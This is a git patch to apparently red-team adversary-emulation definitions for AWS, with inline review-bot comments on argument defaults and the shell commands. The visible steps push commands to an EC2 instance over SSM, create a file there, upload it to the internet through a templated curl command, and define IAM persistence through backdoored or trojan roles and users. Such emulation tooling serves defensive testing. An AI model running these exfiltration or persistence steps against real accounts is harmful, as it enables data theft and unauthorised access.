From cea4ff102b5d049e5197b587f309a2ec6f46b896 Mon Sep 17 00:00:00 2001 From: Isaac Fletcher Date: Fri, 6 Feb 2026 12:29:44 -0800 Subject: [PATCH] Fix AWS TTPs with incomplete arguments Summary: This commit fixes several TTPs that had incorrect/incomplete arguments defined which prevented them from being run successfully. Reviewed By: d0n601 Differential Revision: D92546859 --- .../aws-ec2-exfil-from-ec2-to-internet/ttp.yaml | 13 +++++++------ ttps/persistence/aws-iam-access-iam-role/ttp.yaml | 5 ++++- .../aws-iam-create-new-iam-role/ttp.yaml | 3 +++ .../aws-iam-create-new-iam-user/ttp.yaml | 3 +++ 4 files changed, 17 insertions(+), 7 deletions(-) diff --git a/ttps/exfiltration/aws-ec2-exfil-from-ec2-to-internet/ttp.yaml b/ttps/exfiltration/aws-ec2-exfil-from-ec2-to-internet/ttp.yaml index 2f11da8..0e53139 100644 --- a/ttps/exfiltration/aws-ec2-exfil-from-ec2-to-internet/ttp.yaml +++ b/ttps/exfiltration/aws-ec2-exfil-from-ec2-to-internet/ttp.yaml @@ -11,8 +11,9 @@ description: | The output is stored in file `/tmp/exfil_url.txt` args: - - name: aws_region - description: The AWS region the EC2 instance is in. + - name: region + description: The AWS region to use. + default: us-east-1 - name: ec2_instance_id description: The instance ID of the EC2 to exfiltrate the test file from. - name: generated_exfil_file_path 
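Review bot: The new `default: us-east-1` on `region` sits next to `ec2_instance_id`, which has no default and is only valid in one region, so a run that omits `region` is sent to us-east-1 instead of failing at argument validation. For a TTP that executes commands on an instance, I would leave `region` without a default, or at least tie the two together in the text, e.g. `description: The AWS region of the target EC2 instance (must match ec2_instance_id).` The rename from `aws_region` to `region` also drops the old name, so any wrapper or runbook still passing `aws_region` will presumably break; the commit message should say so. The `args` list continues past the end of this hunk.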
@@ -59,23 +60,23 @@ steps: - name: generate_exfil_file_over_ssm description: Generate a file for exfiltration on the ec2 instance to be exfiltrated. inline: | - aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \ + aws ssm send-command --region {{.Args.region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \ --parameters commands=["sudo su ubuntu && \ openssl rand -out {{.Args.generated_exfil_file_path}} {{.Args.exfil_file_size_bytes}}"] > /dev/null cleanup: inline: | - aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \ + aws ssm send-command --region {{.Args.region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \ --parameters commands=["sudo su ubuntu && \ rm {{.Args.generated_exfil_file_path}}"] > /dev/null - name: upload_exfil_file description: Upload the generated exfil file to the internet. The URL of uploaded file can be found in `tmp/exfil_url.txt` inline: | - aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \ + aws ssm send-command --region {{.Args.region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \ --parameters commands=["sudo su ubuntu && \ {{.Args.curl_upload_command}} {{.Args.generated_exfil_file_path}} -o /tmp/exfil_url.txt && cat /tmp/exfil_url.txt"] > /dev/null cleanup: inline: | - aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \ + aws ssm send-command --region {{.Args.region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \ --parameters commands=["sudo su ubuntu && \ rm /tmp/exfil_url.txt"] > /dev/null 
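Review bot: The `sudo su ubuntu && ...` prefix kept on the context lines of all four `send-command` calls most likely does not run the following command as `ubuntu`. `su` opens its own shell and the part after `&&` is executed by the calling shell, which for `AWS-RunShellScript` is normally root. The cleanup `rm {{.Args.generated_exfil_file_path}}` would then delete an operator-supplied path with elevated privileges. Running the command under the intended user, e.g. `commands=["sudo -u ubuntu rm {{.Args.generated_exfil_file_path}}"]`, keeps a mistyped argument from removing a root-owned file. Separately, `> /dev/null` discards the command ID on every call, so neither the step nor its cleanup can confirm that the remote command ran; keeping the ID and checking it with `aws ssm wait command-executed` would make a wrong `region` or a failed cleanup visible. The `steps` list starts outside this hunk.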
diff --git a/ttps/persistence/aws-iam-access-iam-role/ttp.yaml b/ttps/persistence/aws-iam-access-iam-role/ttp.yaml index 51e998c..c6ed8a0 100644 --- a/ttps/persistence/aws-iam-access-iam-role/ttp.yaml +++ b/ttps/persistence/aws-iam-access-iam-role/ttp.yaml @@ -12,8 +12,11 @@ description: | `--no-cleanup` options should be explicity specified if we do not want the new role created to be deleted. args: + - name: region + description: The AWS region to use. + default: us-east-1 - name: iam_role_name - description: The name of the backdoored IAM role to be assumed. + description: The name of the backdoored IAM role to be assumed. default: ttpforge_trojan_role - name: backdoor_account_id description: AWS account ID which has been backdoored for access via attacker controled IAM role diff --git a/ttps/persistence/aws-iam-create-new-iam-role/ttp.yaml b/ttps/persistence/aws-iam-create-new-iam-role/ttp.yaml index 2b0d2d0..c70d686 100644 --- a/ttps/persistence/aws-iam-create-new-iam-role/ttp.yaml +++ b/ttps/persistence/aws-iam-create-new-iam-role/ttp.yaml @@ -12,6 +12,9 @@ description: | `--no-cleanup` options should be explicity specified if we do not want the new role created to be deleted. args: + - name: region + description: The AWS region to use. + default: us-east-1 - name: iam_role_name description: The name of the new IAM role to be created. default: ttpforge_trojan_role diff --git a/ttps/persistence/aws-iam-create-new-iam-user/ttp.yaml b/ttps/persistence/aws-iam-create-new-iam-user/ttp.yaml index 880d18a..c833016 100644 --- a/ttps/persistence/aws-iam-create-new-iam-user/ttp.yaml +++ b/ttps/persistence/aws-iam-create-new-iam-user/ttp.yaml @@ -11,6 +11,9 @@ description: | `--no-cleanup` options should be explicity specified if we do not want the new user created to be deleted. args: + - name: region + description: The AWS region to use. + default: us-east-1 - name: iam_user_name description: The name of the new IAM user to be created. default: purple_trojan
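Review bot: The `region` argument added to `aws-iam-access-iam-role` is declared but not used on any visible line; the steps that would reference `{{.Args.region}}` are outside the hunk. Presumably they already do, but this is worth confirming, since otherwise the argument is accepted and silently ignored. The same applies to the identical additions in `aws-iam-create-new-iam-role` and `aws-iam-create-new-iam-user`. Because IAM is a global service, the description should say what the value affects, e.g. `description: The AWS region used for the AWS CLI calls (IAM resources themselves are global).` While these descriptions are being touched, the context lines still carry the typos "explicity" and "controled".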